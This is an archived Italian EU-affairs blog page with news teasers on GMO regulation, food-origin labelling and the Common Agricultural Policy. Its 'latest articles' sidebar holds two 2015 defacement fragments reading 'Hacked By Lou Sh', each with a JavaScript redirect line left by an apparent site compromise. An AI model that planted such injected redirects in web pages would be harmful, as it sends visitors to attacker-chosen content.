EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
OGM

it

Cari lettori e ascoltatori, a voi il link per scaricare il file mp3 dell'€urogiornale http://radio.torvergata.it/multimed... Scusandoci per il disagio causato a inizio di settimana, ringraziamo come sempre Radio Tor Vergata per la preziosa collaborazione. Buon ascolto e buona lettura!

L’UE delega il divieto degli Ogm ai singoli Stati Questa è la posizione presa dalla maggioranza del Parlamento Europeo sulla relazione della liberale francese Corinne Lepage. 548 i voti a favore, 31 astensioni e 84 voti contrari. La proposta, che ora dovrà passare all’esame del Consiglio UE, (...)

14
07
2011

Ogm si Ogm no

it

Nella votazione che martedì scorso ha visto il Parlamento Europeo dare l’ok alla decisione di delegare il diritto di divieto degli Ogm ai singoli Paesi, ci sono stati 548 voti per il si, 31 astenuti e 84 contrari. Numeri che dimostrano quanto sia stata apprezzata la proposta della francese liberale Corinne Lepage, che ha chiesto carta bianca sugli Ogm per tutti i Paesi comunitari per motivi agro-ambientali, come “la resistenza ai pesticidi, l'invasività di certe colture e la minaccia alla biodiversità”.

Se il Consiglio UE dell’ambiente approverà a maggioranza qualificata il testo, i divieti nazionali di coltura di Organismi geneticamente modificati autorizzati saranno possibili sulla base di motivazioni ambientali (“come lo sviluppo di erbe infestanti resistenti agli erbicidi e la protezione (...)

it

La Terra, la nostra casa, la casa di tutti noi, si sgretola ogni giorno un po’ di più sotto i nostri piedi. Un cambiamento così drammatico e irreversibile contro di cui non possiamo fare niente data la nostra limitatezza. O forse non è così?

Una tappa del viaggio per dare risposta a questa domanda passa anche per la Garbatella il 26 febbraio alle ore 11:00. Il centro “Casetta Rossa” ospita un interessante incontro nell’ambito del progetto “Europe on the ground” con la compartecipazione del Circolo Legambiente Garbatella, sul tema del (...)

it

Finisce l’era dei prodotti agroalimentari spacciati per italiani grazie alla nuova legge sulla trasparenza dei prodotti. Non avremo più a che fare con mozzarelle “napoletane” della Germania o con i salumi romagnoli direttamente dalla Cina. Dall’attuazione del decreto i consumatori potranno accertarsi direttamente sulla reale provenienza dei prodotti alimentari.

Lo scorso 12 gennaio la Commissione Agricoltura della Camera ha approvato in via definitiva la legge sull’“etichettatura” e sul “pacchetto qualità”. Fino ad oggi le etichette d’origine in Italia erano obbligatorie solo per pochi prodotti: uova, latte fresco, carne, passata di pomodoro e olio extra (...)

it

Nell’immediato dopoguerra, quando trovare qualcosa da mangiare era il principale problema quotidiano, i paesi membri della Comunità europea adottarono ogni sorta di programma per assistere e incoraggiare agricoltori e allevatori a produrre di più. Nel corso degli anni Cinquanta e nel periodo successivo, la produzione continuò ad aumentare nonostante la manodopera fosse attirata da nuovi lavori nelle città e gli agro allevatori stessero diventando sempre più capaci.

E’ su questo sfondo che si inquadra la Politica agricola comune (PAC), istituita nel 1962 e formalizzata nel 1970. Dalla sua formalizzazione e con il progressivo aumento dei prezzi avvenuta negli anni Settanta, tutta la produzione alimentare europea divenne troppo costosa per competere su un (...)

OGM
it

Il 2 marzo 2010, la Commissione europea ha adottato due decisioni sulla patata geneticamente modificata Amflora, relative alla coltivazione a fini industriali, nonché all’uso nei mangimi di sottoprodotti dell’amido di Amflora e tre decisioni che autorizzano l’importazione e la lavorazione di mais (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France